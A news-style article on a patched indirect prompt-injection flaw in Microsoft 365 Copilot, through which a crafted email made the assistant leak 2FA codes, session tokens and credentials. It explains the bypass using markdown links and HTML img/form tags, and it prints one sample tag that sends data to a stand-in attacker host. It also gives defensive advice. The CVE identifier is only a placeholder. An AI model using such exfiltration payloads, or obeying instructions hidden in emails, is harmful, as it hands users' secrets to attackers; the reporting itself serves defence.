Critical Vulnerability in Copilot Allows Theft of 2FA Codes

TL;DR: A critical vulnerability in Microsoft 365 Copilot, now patched, allowed attackers to steal 2FA codes via indirect prompt injection. The flaw exploits the inability of LLMs to distinguish between user instructions and malicious content.

Last Tuesday, Microsoft fixed a vulnerability rated as critical in its artificial intelligence platform Microsoft 365 Copilot. On Monday, the researchers who discovered the flaw and reported it to Microsoft revealed how their proof of concept could retrieve two-factor authentication (2FA) codes and other sensitive data from emails accessible by Copilot. The vulnerability, identified as CVE-2026-XXXX (not yet publicly assigned), was classified with a CVSS score of 9.8 out of 10, underscoring its severity. According to Ars Technica's report, the attack exploits Copilot's ability to process emails and other content, allowing information exfiltration without direct user interaction beyond receiving a malicious message.

The Root of the Problem: LLM Gullibility

Microsoft and other providers of large language models (LLMs) have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots cannot distinguish between instructions provided by users and those hidden in third-party content that the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. Without a way to secure this critical boundary, Microsoft and its peers are forced to erect complicated, ad-hoc security barriers to control the consequences of this incurable gullibility. This problem, known as 'indirect prompt injection,' was first documented by researchers at the University of Washington in 2023, and has since become a fundamental challenge for LLM security. The lack of an isolation mechanism between user instructions and third-party content is an architectural weakness with no trivial solution, as it would require the model to distinguish intentionality, something current LLMs cannot reliably do.

Bypassing Security Barriers

One of the built-in barriers in Copilot and most LLMs prevents them from submitting web forms, sending emails, and performing similar actions that could be used to extract user data. To bypass this, attackers turned to markup language, which allows adding formatting elements like headers, lists, and links without needing HTML tags. Another solution involves wrapping sensitive data inside HTML tags like <img> and <form>. In both cases, a web request displaying the data reaches the attacker's web server, where the secret information is captured in logs. For example, if Copilot processes an email containing an <img src="https://attacker.com/steal?data=secret"> tag, the browser or Copilot itself might attempt to load that image, sending the data to the attacker's server. In the reported proof of concept, researchers managed to extract 2FA codes, session tokens, and credentials stored in emails, all without the user clicking any link. The attack works even if Copilot only summarizes an email, as the LLM can interpret hidden tags as instructions to perform actions.

“The inability of LLMs to distinguish between legitimate instructions and malicious ones embedded in third-party content is a fundamental problem that still has no solution.”

Impact and Consequences

The vulnerability affects all users of Microsoft 365 Copilot who have enabled integration with email and other data sources. An attacker could send a seemingly harmless email that, when processed by Copilot, triggers the exfiltration of 2FA codes, session tokens, or credentials. This jeopardizes the security of corporate and personal accounts, potentially allowing unauthorized access to critical systems. Since Copilot has access to emails, calendars, documents, and other Microsoft 365 data sources, the potential damage is massive. Companies using Copilot to automate workflows could have their administrator accounts compromised, allowing attackers to read all emails, modify settings, or even access linked cloud services. Microsoft has already released a patch, but experts warn that this type of vulnerability is inherent to the current architecture of LLMs. Until the indirect prompt injection problem is resolved, similar flaws will continue to appear. In fact, over the past two years, similar vulnerabilities have been reported in products like ChatGPT, Google Bard, and open-source assistants, though Copilot's privileged access to corporate data elevates the severity.

What Users Should Do

Update Microsoft 365 Copilot to the latest available version. The June 12, 2026 patch fixes this specific vulnerability but does not protect against future variants.
Review access and activity logs to detect possible exfiltration. Look for requests to unknown or unusual domains in network logs.
Implement phishing-resistant multi-factor authentication, such as FIDO2 security keys, which do not rely on codes sent via email.
Limit Copilot's access to sensitive data through permission policies. For example, restrict which mailboxes Copilot can read or disable email integration if not strictly necessary.
Train employees to recognize suspicious emails, although the attack requires no interaction, prevention remains key.

Historical Context and Comparisons

This incident adds to a long list of vulnerabilities in AI assistants, such as prompt injection attacks on ChatGPT and Google Bard. The key difference is that Copilot has privileged access to corporate data (emails, calendars, documents), amplifying the potential damage. In 2023, researchers demonstrated similar attacks against ChatGPT plugins, successfully extracting conversation data. In 2024, flaws were reported in open-source AI assistants like Ollama, where a malicious prompt could execute system commands. However, the Copilot case is particularly severe because it is integrated into Microsoft's enterprise ecosystem, with millions of active users. Compared to the prompt injection attack on Bing Chat in 2023, which allowed reading chat history, this new attack goes further by exfiltrating data in real time without user intervention. The industry is far from a definitive solution. Meanwhile, companies must assume that LLMs are inherently insecure against malicious content and adopt defense-in-depth measures. Microsoft, for its part, has announced it is working on 'sandboxing' mechanisms to isolate user instructions from third-party content, but no implementation date has been set.

The Root of the Problem: LLM Gullibility

Bypassing Security Barriers

Impact and Consequences

What Users Should Do

Historical Context and Comparisons

Keep reading